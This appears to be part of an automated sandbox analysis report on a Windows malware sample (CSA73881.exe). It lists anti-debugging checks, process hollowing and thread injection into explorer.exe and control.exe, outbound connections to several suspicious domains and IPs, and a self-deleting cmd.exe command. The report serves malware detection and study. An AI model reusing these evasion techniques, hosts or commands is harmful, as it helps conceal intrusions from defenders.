Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F4D3B mov eax, dword ptr fs:[00000030h]	14_2_012F4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F4D3B mov eax, dword ptr fs:[00000030h]	14_2_012F4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F4D3B mov eax, dword ptr fs:[00000030h]	14_2_012F4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]	14_2_012D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]	14_2_012D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]	14_2_012D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]	14_2_012D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]	14_2_012D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]	14_2_012D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]	14_2_012D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]	14_2_012D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]	14_2_012D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]	14_2_012D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]	14_2_012D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]	14_2_012D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]	14_2_012D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012CAD30 mov eax, dword ptr fs:[00000030h]	14_2_012CAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EC577 mov eax, dword ptr fs:[00000030h]	14_2_012EC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EC577 mov eax, dword ptr fs:[00000030h]	14_2_012EC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01303D43 mov eax, dword ptr fs:[00000030h]	14_2_01303D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01343540 mov eax, dword ptr fs:[00000030h]	14_2_01343540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01373D40 mov eax, dword ptr fs:[00000030h]	14_2_01373D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012E7D50 mov eax, dword ptr fs:[00000030h]	14_2_012E7D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F35A1 mov eax, dword ptr fs:[00000030h]	14_2_012F35A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013905AC mov eax, dword ptr fs:[00000030h]	14_2_013905AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013905AC mov eax, dword ptr fs:[00000030h]	14_2_013905AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F1DB5 mov eax, dword ptr fs:[00000030h]	14_2_012F1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F1DB5 mov eax, dword ptr fs:[00000030h]	14_2_012F1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F1DB5 mov eax, dword ptr fs:[00000030h]	14_2_012F1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C2D8A mov eax, dword ptr fs:[00000030h]	14_2_012C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C2D8A mov eax, dword ptr fs:[00000030h]	14_2_012C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C2D8A mov eax, dword ptr fs:[00000030h]	14_2_012C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C2D8A mov eax, dword ptr fs:[00000030h]	14_2_012C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C2D8A mov eax, dword ptr fs:[00000030h]	14_2_012C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F2581 mov eax, dword ptr fs:[00000030h]	14_2_012F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F2581 mov eax, dword ptr fs:[00000030h]	14_2_012F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F2581 mov eax, dword ptr fs:[00000030h]	14_2_012F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F2581 mov eax, dword ptr fs:[00000030h]	14_2_012F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012FFD9B mov eax, dword ptr fs:[00000030h]	14_2_012FFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012FFD9B mov eax, dword ptr fs:[00000030h]	14_2_012FFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01378DF1 mov eax, dword ptr fs:[00000030h]	14_2_01378DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012DD5E0 mov eax, dword ptr fs:[00000030h]	14_2_012DD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012DD5E0 mov eax, dword ptr fs:[00000030h]	14_2_012DD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0138FDE2 mov eax, dword ptr fs:[00000030h]	14_2_0138FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0138FDE2 mov eax, dword ptr fs:[00000030h]	14_2_0138FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0138FDE2 mov eax, dword ptr fs:[00000030h]	14_2_0138FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0138FDE2 mov eax, dword ptr fs:[00000030h]	14_2_0138FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01346DC9 mov eax, dword ptr fs:[00000030h]	14_2_01346DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01346DC9 mov eax, dword ptr fs:[00000030h]	14_2_01346DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01346DC9 mov eax, dword ptr fs:[00000030h]	14_2_01346DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01346DC9 mov ecx, dword ptr fs:[00000030h]	14_2_01346DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01346DC9 mov eax, dword ptr fs:[00000030h]	14_2_01346DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01346DC9 mov eax, dword ptr fs:[00000030h]	14_2_01346DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012FBC2C mov eax, dword ptr fs:[00000030h]	14_2_012FBC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0139740D mov eax, dword ptr fs:[00000030h]	14_2_0139740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0139740D mov eax, dword ptr fs:[00000030h]	14_2_0139740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0139740D mov eax, dword ptr fs:[00000030h]	14_2_0139740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]	14_2_01381C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]	14_2_01381C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]	14_2_01381C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]	14_2_01381C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]	14_2_01381C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]	14_2_01381C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]	14_2_01381C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]	14_2_01381C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]	14_2_01381C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]	14_2_01381C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]	14_2_01381C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]	14_2_01381C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]	14_2_01381C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01381C06 mov eax, dword ptr fs:[00000030h]	14_2_01381C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01346C0A mov eax, dword ptr fs:[00000030h]	14_2_01346C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01346C0A mov eax, dword ptr fs:[00000030h]	14_2_01346C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01346C0A mov eax, dword ptr fs:[00000030h]	14_2_01346C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01346C0A mov eax, dword ptr fs:[00000030h]	14_2_01346C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012E746D mov eax, dword ptr fs:[00000030h]	14_2_012E746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012FA44B mov eax, dword ptr fs:[00000030h]	14_2_012FA44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0135C450 mov eax, dword ptr fs:[00000030h]	14_2_0135C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0135C450 mov eax, dword ptr fs:[00000030h]	14_2_0135C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D849B mov eax, dword ptr fs:[00000030h]	14_2_012D849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013814FB mov eax, dword ptr fs:[00000030h]	14_2_013814FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01346CF0 mov eax, dword ptr fs:[00000030h]	14_2_01346CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01346CF0 mov eax, dword ptr fs:[00000030h]	14_2_01346CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01346CF0 mov eax, dword ptr fs:[00000030h]	14_2_01346CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01398CD6 mov eax, dword ptr fs:[00000030h]	14_2_01398CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C4F2E mov eax, dword ptr fs:[00000030h]	14_2_012C4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C4F2E mov eax, dword ptr fs:[00000030h]	14_2_012C4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012FE730 mov eax, dword ptr fs:[00000030h]	14_2_012FE730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012FA70E mov eax, dword ptr fs:[00000030h]	14_2_012FA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012FA70E mov eax, dword ptr fs:[00000030h]	14_2_012FA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0135FF10 mov eax, dword ptr fs:[00000030h]	14_2_0135FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0135FF10 mov eax, dword ptr fs:[00000030h]	14_2_0135FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0139070D mov eax, dword ptr fs:[00000030h]	14_2_0139070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0139070D mov eax, dword ptr fs:[00000030h]	14_2_0139070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EF716 mov eax, dword ptr fs:[00000030h]	14_2_012EF716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012DFF60 mov eax, dword ptr fs:[00000030h]	14_2_012DFF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01398F6A mov eax, dword ptr fs:[00000030h]	14_2_01398F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012DEF40 mov eax, dword ptr fs:[00000030h]	14_2_012DEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01347794 mov eax, dword ptr fs:[00000030h]	14_2_01347794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01347794 mov eax, dword ptr fs:[00000030h]	14_2_01347794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01347794 mov eax, dword ptr fs:[00000030h]	14_2_01347794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D8794 mov eax, dword ptr fs:[00000030h]	14_2_012D8794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013037F5 mov eax, dword ptr fs:[00000030h]	14_2_013037F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0137FE3F mov eax, dword ptr fs:[00000030h]	14_2_0137FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012CE620 mov eax, dword ptr fs:[00000030h]	14_2_012CE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012CC600 mov eax, dword ptr fs:[00000030h]	14_2_012CC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012CC600 mov eax, dword ptr fs:[00000030h]	14_2_012CC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012CC600 mov eax, dword ptr fs:[00000030h]	14_2_012CC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F8E00 mov eax, dword ptr fs:[00000030h]	14_2_012F8E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01381608 mov eax, dword ptr fs:[00000030h]	14_2_01381608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012FA61C mov eax, dword ptr fs:[00000030h]	14_2_012FA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012FA61C mov eax, dword ptr fs:[00000030h]	14_2_012FA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D766D mov eax, dword ptr fs:[00000030h]	14_2_012D766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EAE73 mov eax, dword ptr fs:[00000030h]	14_2_012EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EAE73 mov eax, dword ptr fs:[00000030h]	14_2_012EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EAE73 mov eax, dword ptr fs:[00000030h]	14_2_012EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EAE73 mov eax, dword ptr fs:[00000030h]	14_2_012EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EAE73 mov eax, dword ptr fs:[00000030h]	14_2_012EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D7E41 mov eax, dword ptr fs:[00000030h]	14_2_012D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D7E41 mov eax, dword ptr fs:[00000030h]	14_2_012D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D7E41 mov eax, dword ptr fs:[00000030h]	14_2_012D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D7E41 mov eax, dword ptr fs:[00000030h]	14_2_012D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D7E41 mov eax, dword ptr fs:[00000030h]	14_2_012D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D7E41 mov eax, dword ptr fs:[00000030h]	14_2_012D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0138AE44 mov eax, dword ptr fs:[00000030h]	14_2_0138AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0138AE44 mov eax, dword ptr fs:[00000030h]	14_2_0138AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013446A7 mov eax, dword ptr fs:[00000030h]	14_2_013446A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01390EA5 mov eax, dword ptr fs:[00000030h]	14_2_01390EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01390EA5 mov eax, dword ptr fs:[00000030h]	14_2_01390EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01390EA5 mov eax, dword ptr fs:[00000030h]	14_2_01390EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0135FE87 mov eax, dword ptr fs:[00000030h]	14_2_0135FE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F16E0 mov ecx, dword ptr fs:[00000030h]	14_2_012F16E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D76E2 mov eax, dword ptr fs:[00000030h]	14_2_012D76E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F36CC mov eax, dword ptr fs:[00000030h]	14_2_012F36CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01398ED6 mov eax, dword ptr fs:[00000030h]	14_2_01398ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0137FEC0 mov eax, dword ptr fs:[00000030h]	14_2_0137FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01308EC7 mov eax, dword ptr fs:[00000030h]	14_2_01308EC7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 14_2_01309910 NtAdjustPrivilegesToken,LdrInitializeThunk,

14_2_01309910

Source: C:\Users\user\Desktop\CSA73881.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.segurambiental.com
Source: C:\Windows\explorer.exe	Domain query: www.browardhomeappraisal.com
Source: C:\Windows\explorer.exe	Network Connect: 103.224.182.210 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.esrfy.xyz
Source: C:\Windows\explorer.exe	Domain query: www.comgmaik.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.merendri.com
Source: C:\Windows\explorer.exe	Network Connect: 75.2.26.18 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Section unmapped: C:\Windows\SysWOW64\control.exe base address: 890000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\CSA73881.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: AB7008	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\CSA73881.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread register set: target process: 3968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread register set: target process: 3968	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Thread register set: target process: 3968	Jump to behavior

Source: C:\Users\user\Desktop\CSA73881.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: explorer.exe, 00000010.00000000.318909636.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.375375689.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.435659578.0000000000688000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ProgmanEXE^
Source: explorer.exe, 00000010.00000000.356215989.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.386225698.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.321643618.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000010.00000000.321643618.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.396586239.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.437265455.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000010.00000000.321643618.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.396586239.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.437265455.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000010.00000000.395610041.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.319100792.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.375444766.000000000069D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd4
Source: explorer.exe, 00000010.00000000.321643618.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.396586239.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.437265455.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: WProgram Manager

Source: C:\Users\user\Desktop\CSA73881.exe	Queries volume information: C:\Users\user\Desktop\CSA73881.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
